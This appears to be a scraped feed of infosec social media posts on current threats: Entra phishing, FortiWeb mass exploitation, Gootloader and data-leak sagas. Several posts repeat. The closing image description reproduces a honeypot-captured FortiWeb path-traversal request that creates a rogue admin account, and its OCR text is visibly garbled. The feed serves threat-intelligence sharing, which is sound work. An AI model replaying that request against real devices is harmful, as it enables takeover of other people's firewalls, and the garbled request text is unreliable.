#Tag
Actual threat intelligence! A few friends and I identified a new reverse phishing campaign leveraging Entra Guest User invitations.
This campaign was newly discovered and corroborated. I recommend reviewing organization email for these invitations.
Heads up if you're unfortunate enough to be an M365 / Entra shop. There is a TOAD / phishing campaign going on targeting M365 tenants and because the senders are also MS tenants, they tend to be allowed.
Heads up if you're unfortunate enough to be an M365 / Entra shop. There is a TOAD / phishing campaign going on targeting M365 tenants and because the senders are also MS tenants, they tend to be allowed.
Actual threat intelligence! A few friends and I identified a new reverse phishing campaign leveraging Entra Guest User invitations.
This campaign was newly discovered and corroborated. I recommend reviewing organization email for these invitations.
More on the meow attack. FWIW, I am attributing it to the threat actor known as @catsalad .
Anyone have some FortiShit to test something on?
https://x.com/DefusedCyber/status/1986544427121471513
⚠️Actor mass exploiting unknown Fortinet exploit (FortiWeb path traversal / API exploitation) from 107.152.41.19 🇺🇸 ( TZULO )
VirusTotal Detections 0/95 🟢
After the exploit, the actor attempted to login using the newly created username-credential pair 🔐
More on the meow attack. FWIW, I am attributing it to the threat actor known as @catsalad .
Anyone have some FortiShit to test something on?
https://x.com/DefusedCyber/status/1986544427121471513
⚠️Actor mass exploiting unknown Fortinet exploit (FortiWeb path traversal / API exploitation) from 107.152.41.19 🇺🇸 ( TZULO )
VirusTotal Detections 0/95 🟢
After the exploit, the actor attempted to login using the newly created username-credential pair 🔐
Huntress has published an article about Gootloader with an absolutely ridiculous amount of IoCs to hunt for, beyond an already excellent technical deep dive.
https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation
Raising the bar?
New UI to RansomLook.io
The open source project providing real-time ransomware intelligence.
Thanks to @F_kZ_ for the incredible work.
Someone asked me to hand-translate a publicly posted Chinese technical report about NSA shenanigans on the Chinese Center for Time-Keeping network. It took me a while, because it turns out translating technical corporatese from your third language is very hard when chronically sleep deprived, but it is done.
https://docs.google.com/document/d/1gk1fDLKrN3m5jOSk7QbpGL1SBcLvrm0FTN3H-5ZJZcY/edit?usp=sharing
High confidence of a data breach targeting the UK 🇬🇧 Government Administration sector. Alleged leak of Ministry of Justice court documents. #DataBreach #CyberSecurity #ThreatIntel
Someone asked me to hand-translate a publicly posted Chinese technical report about NSA shenanigans on the Chinese Center for Time-Keeping network. It took me a while, because it turns out translating technical corporatese from your third language is very hard when chronically sleep deprived, but it is done.
https://docs.google.com/document/d/1gk1fDLKrN3m5jOSk7QbpGL1SBcLvrm0FTN3H-5ZJZcY/edit?usp=sharing
Someone asked me to hand-translate a publicly posted Chinese technical report about NSA shenanigans on the Chinese Center for Time-Keeping network. It took me a while, because it turns out translating technical corporatese from your third language is very hard when chronically sleep deprived, but it is done.
https://docs.google.com/document/d/1gk1fDLKrN3m5jOSk7QbpGL1SBcLvrm0FTN3H-5ZJZcY/edit?usp=sharing
Quick question to the blue teamers out there:
What's your take on MITRE ATT&CK Tactics and Techniques? Do you find them useful? If yes, how and in what capacity do you use them? (To the extent that you can and want to share...)
If you could have tactics and techniques extracted from publicly available reports/articles, would that be useful? If yes, why?
(And imagine extracted not just by direct technique referencing, but also indirectly extracted through textual descriptions.)
GitHub User Compromised with Invisible Malware
Updates on Glassworm.
I think a whole bunch of orgs probably need to start rotating certificates and such. #threatintel
I think a whole bunch of orgs probably need to start rotating certificates and such. #threatintel
The Red Hat Consulting LAPSUS$ saga continues - in the past hour they've released a 2.2gb ZIP file.
The Scattered Lapsus$ Hunters portal has 25 victim orgs posted so far, they're an average of about one every 10 minutes.
I've talked to one of the victim orgs - their sample data is indeed from their Salesforce instance. Gonna be a long weekend for a bunch of orgs. Each org also has sample downloads up too.
A space for Bonfire maintainers and contributors to communicate
![POST /api/v2.0/cmdb/system/
admin%3F/../../../../../cgi-bin/fwbcgi
General REST API
2025-11-06 18:04:50
Attack Source Target Decoy Decoy Name
107.152.41.19:60342 [redacted] forti_web_05
No DNS record found
Attack Payload | copy | REDACTED
POST /ap1/v2.0/cndb/systen/adnink3F/ ../.../../. ./../cgi-bin/fubcgl HTTP/1.1
Host: [redacted]
User-Agent: python-url1ib3/2.2.3
Accept-Encoding: identity
CGIINFO: yJ1c2VybnFtZSI6ICINZG1pbISTCINCRINDRFEZS IG ICINCOmX2FKbNLUT ug TnZKb29101A1CRVACTS IC Sb 2dpbmShbUL0IALYWREANAL Fg==
Content-Length: 835
Content-Type: application/json
{"data": {"q_type": 1, "name": "Testpoint", "access-profile’: "prof admin", "access-profile val’: "0", "trusthostva": "0.0.0.0/0
", "trusthostve": "::/@ ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": ",
"hidden": 0, "domains": "root", "sz_dashboard": -1, "type": "local-user”, "type val’: "0", "adnin-usergrp_val": "0",
"wildcard val": "0", "accprofile-override val’: "0%, "sshkey": "¥, "passud-set-tine": 0, "history-password-pos: 0, "history-
password@”: "", "history-passwordi": "*, "history-password2": "*, “history-password3": "*, "history-password4”: "*, “"history-
passwords": "*, "history-password6": "*, "history-password7": "*, "history-password8": "", "history-passwordd": "", "force-
password-change"': "disable", "force-password-change val": "0", "password": "AFodIUU3SSzpS'}}
Raw request shown; binary replaced with “." on decode.](https://media.infosec.exchange/infosec.exchange/media_attachments/files/115/508/940/388/991/609/original/d1f81790ca21a7fd.png)
